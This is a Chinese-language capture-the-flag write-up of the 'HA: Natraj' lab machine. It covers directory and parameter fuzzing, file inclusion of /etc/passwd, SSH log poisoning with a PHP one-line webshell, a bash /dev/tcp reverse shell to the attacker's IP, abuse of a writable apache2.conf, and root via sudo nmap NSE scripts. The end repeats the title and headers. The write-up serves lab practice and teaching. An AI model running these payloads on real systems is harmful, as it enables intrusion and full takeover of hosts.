【offensive-security】2.HA: Natraj靶机

typoraimage-20221025094751654.png

一、获取靶机信息

1.已知信息：

IP: 192.168.214.80

2.获取信息：

nmap扫描开启的服务

┌──(lo0p㉿0xlo0p)-[~]
└─$ ping 192.168.214.80       
PING 192.168.214.80 (192.168.214.80) 56(84) bytes of data.
64 bytes from 192.168.214.80: icmp_seq=1 ttl=63 time=200 ms
64 bytes from 192.168.214.80: icmp_seq=2 ttl=63 time=206 ms
^C
--- 192.168.214.80 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 199.915/202.932/205.950/3.017 ms

┌──(lo0p㉿0xlo0p)-[~]
└─$ dirsearch -u 192.168.214.80     

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/lo0p/.dirsearch/reports/192.168.214.80_22-10-25_09-09-23.txt

Error Log: /home/lo0p/.dirsearch/logs/errors-22-10-25_09-09-23.log

Target: http://192.168.214.80/

[09:09:23] Starting:                                    
[09:10:06] 200 -  942B  - /console/                                         
[09:10:06] 301 -  318B  - /console  ->  http://192.168.214.80/console/      
[09:10:15] 200 -    5KB - /images/                                          
[09:10:15] 301 -  317B  - /images  ->  http://192.168.214.80/images/        
[09:10:16] 200 -   14KB - /index.html                                       
                                                                             
Task Completed

进入console目录，发现存在file.php，盲猜存在任意文件读取漏洞

typoraimage-20221025095028402.png

ffuf爆破参数名

┌──(lo0p㉿0xlo0p)-[~]
└─$ ffuf -u 'http://192.168.214.80/console/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.214.80/console/file.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 0
________________________________________________

file                    [Status: 200, Size: 1398, Words: 9, Lines: 28]

爆出参数名为file，直接读取/etc/passwd等文件，获取可ssh的用户名共三个：root、natraj、mahakal

利用用户登录日志(/var/log/auth.log)进行一句话木马的加载

┌──(lo0p㉿0xlo0p)-[~]
└─$ ssh "<?php system(\$_GET[CMD]); ?>"@192.168.214.80
<?php system($_GET[CMD]); ?>@192.168.214.80's password: 
Permission denied, please try again.

将用户名(一句话木马)打进日志中，再利用上面的文件读取漏洞解析这个一句话木马，直接上反弹shell

payload: 192.168.214.80/console/file.php?file=/var/log/auth.log&cmd=bash -c 'exec bash -i %26>%2Fdev%2Ftcp%2F192.168.49.214%2F8888 <%261'

查找可利用点

find / -user root -perm -4000 -print 2>/dev/null    //查找suid
find / -perm -4000 2>dev/null | xargs ls -la     //查找suid并详细展示
find / -writable -type d 2>/dev/null          //查找当前权限可写的路径
/dev/mqueue
/dev/shm
/run/lock
/run/lock/apache2
/proc/1291/task/1291/fd
/proc/1291/fd
/proc/1291/map_files
/tmp
/var/www
/var/www/html
/var/www/html/console
/var/www/html/images
/var/tmp
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
find / -type f -perm 777 -exec ls -l {} \; 2>/dev/null       //查找777文件
-rwxrwxrwx 1 root root 7224 Mar 13  2020 /etc/apache2/apache2.conf
find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root     //查找写权限文件
-rwxrwxrwx 1 root     root       7224 Mar 13  2020 /etc/apache2/apache2.conf
--w--w--w- 1 root     root          0 Oct 24 19:14 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root     root          0 Oct 17 19:54 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root     root          0 Oct 17 19:54 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root     root          0 Oct 17 19:54 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root     root          0 Oct 17 19:54 /sys/kernel/security/apparmor/.replace

发现/etc/apache2/apache2.conf可读写，查看该文件

# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}

将apache的启动用户改成上面/etc/passwd中获得的用户（root用户除外，apache不允许root用户启动），可获取natraj、mahakal的权限

执行sudo -l查看www-data用户的权限

www-data@ubuntu:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/systemctl start apache2
    (ALL) NOPASSWD: /bin/systemctl stop apache2
    (ALL) NOPASSWD: /bin/systemctl restart apache2

发现可以重启apache2，重启后重新反弹shell即可获取natraj、mahakal的权限

┌──(lo0p㉿0xlo0p)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.49.214] from (UNKNOWN) [192.168.214.80] 36300
bash: cannot set terminal process group (1476): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

natraj@ubuntu:/var/www/html/console$

继续查看可利用点，natraj貌似没有利用点，换个mahakal

┌──(lo0p㉿0xlo0p)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.49.214] from (UNKNOWN) [192.168.214.80] 59936
bash: cannot set terminal process group (937): Inappropriate ioctl for device
bash: no job control in this shell
mahakal@ubuntu:/var/www/html/console$ sudo -l
sudo -l
Matching Defaults entries for mahakal on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mahakal may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/nmap

发现mahakal可以利用nmap提权至root

老版本nmap利用：
sudo nmap --interactive #执行nmap的可交互模式
!bash or !sh #进入bash或sh
新版本nmap利用：
echo 'os.execute("/bin/sh")' > /tmp/nse_root.nse
#nse是nmap的插件扩展名
nmap --script=/tmp/nse_root.nse

也可以参考：nmap | GTFOBins

mahakal@ubuntu:/tmp$ TF=$(mktemp)
TF=$(mktemp)
mahakal@ubuntu:/tmp$ echo $TF
mahakal@ubuntu:/tmp$ echo 'os.execute("/bin/bash")' > $TF
mahakal@ubuntu:/tmp$ sudo nmap --script=$TF

Starting Nmap 7.60 ( https://nmap.org ) at 2022-10-24 20:06 PDT
NSE: Warning: Loading '/tmp/tmp.FAkO8IMrkw' -- the recommended file extension is '.nse'.


whoami
root
cd /root
ls
proof.txt
root.txt
cat root.txt
Your flag is in another file...
cat proof.txt
c64360b926ca96882f943b1f10cce059

2. HA: Natraj靶机

2. HA: Natraj靶机

【offensive-security】2.HA: Natraj靶机

一、获取靶机信息

1.已知信息：

2.获取信息：